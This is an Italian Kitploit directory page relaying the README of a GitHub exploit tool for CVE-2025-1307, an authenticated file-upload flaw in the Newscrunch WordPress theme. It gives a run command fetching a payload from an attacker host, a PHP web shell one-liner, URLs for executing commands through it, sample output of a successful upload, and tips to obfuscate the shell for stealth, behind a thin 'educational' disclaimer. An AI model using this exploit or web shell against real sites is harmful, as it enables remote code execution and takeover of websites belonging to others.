Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-1307 — Newscrunch <= 1.8.4 - Caricamento arbitrario di file autenticato (Abbonato+) | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-1307
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubnxploited/cve-2025-1307

CVE-2025-1307

Newscrunch <= 1.8.4 - Caricamento arbitrario di file autenticato (Abbonato+)

Vedi Repository
2141 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit Newscrunch (CVE-2025-1307)

🚨 Panoramica

Questo exploit prende di mira una vulnerabilità critica (CVE-2025-1307) nel tema WordPress Newscrunch. La falla permette a utenti autenticati (di livello Abbonato e superiore) di caricare file arbitrari a causa della mancanza di controlli di capacità nella funzione newscrunch_install_and_activate_plugin(). Ciò può portare a Remote Code Execution (RCE), compromettendo completamente il sito WordPress interessato.


🔥 Dettagli della Vulnerabilità

  • CVE ID: CVE-2025-1307
  • Software Affetto: Tema WordPress Newscrunch (<= 1.8.4.1)
  • Classificazione CWE: CWE-862 - Autorizzazione Mancante
  • Punteggio CVSS: 9.8 (Critico)
  • Vettore: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Data di Pubblicazione: 4 marzo 2025

🛑 Gravità e Impatto

  • ✅ Esecuzione Remota di Codice (RCE)
  • ✅ Compromissione Completa del Sistema
  • ✅ Caricamento di File Non Autorizzato
  • ✅ Rischio di Escalation dei Privilegi

Sfruttabilità: Richiede un account WordPress valido con privilegi di Abbonato o superiori.


📜 Caratteristiche dello Script

✅ Sfruttamento Automatico di CVE-2025-1307
✅ Rilevamento Automatico della Versione Vulnerabile del Tema
✅ Estrazione ed Esecuzione Automatica del Payload ZIP
✅ Recupero Dinamico del Nome del File Shell dallo ZIP
✅ Verifica Automatica della Disponibilità della Shell dopo lo Sfruttamento
✅ Logging Pulito e Strutturato per il Debug


🚀 Come Usare

📌 Prerequisiti

Assicurati di avere Python 3.x installato e installa le dipendenze necessarie:

pip install requests urllib3 packaging

🔧 Esecuzione dell'Exploit

python CVE-2025-1307.py -u "http://target" -un "admin" -p "password" -pl "http://attacker.com/malicious.zip"

🔹 Utilizzo

Exploit per CVE-2025-1307 nel Tema WordPress Newscrunch di Nxploit | Khaled Alenazi

options:
  -h, --help            mostra questo messaggio di aiuto ed esci
  -u URL, --url URL     URL del target WordPress (es. https://example.com)
  -un USERNAME, --username USERNAME
                        Nome utente WordPress
  -p PASSWORD, --password PASSWORD
                        Password WordPress
  -pl PAYLOAD_URL, --payload_url PAYLOAD_URL
                        URL del file malevolo da caricare

🛠️ Utilizzo della Shell Caricata

Una volta che la shell è stata caricata con successo, permette l'esecuzione di comandi remoti sul sistema target. Il file shell deve essere inserito in un archivio ZIP e verrà estratto automaticamente durante lo sfruttamento.

🔹 Creazione del Payload ZIP

Assicurati che la tua shell PHP (shell.php) sia all'interno di un archivio ZIP. Quindi, carica il file ZIP usando l'exploit.

<?php system($_GET['cmd']); ?>

🔹 Esecuzione dei Comandi

Puoi eseguire comandi di sistema tramite il browser aggiungendo il parametro cmd all'URL della shell:

http://target/wp-content/plugins/shell.php?cmd=whoami

⚠️ Protezione della Shell

  • Poiché si tratta di una semplice web shell, non ha autenticazione e deve essere usata con cautela.
  • Se rilevata, può essere facilmente rimossa dagli amministratori.
  • Considera l'uso di codice PHP offuscato o shell protette da password per operazioni stealth.

🔹 Output Previsto

[+] Newscrunch theme version detected: 1.8.4
[+] Exploitation is possible, proceeding...
[*] Logging in...
[+] Logged in successfully.
[*] Uploading and extracting payload...
[+] Exploit executed successfully. Malicious file uploaded.
[*] Checking if shell is accessible: http://target/wp-content/plugins/U.php
[+] Shell successfully uploaded and accessible: http://target/wp-content/plugins/U.php?cmd=ls

⚠️ Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza. Lo sfruttamento non autorizzato delle vulnerabilità è illegale e punibile dalla legge. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Usalo in modo responsabile.

Di: Nxploit | Khaled Alenazi

Scarica lo strumento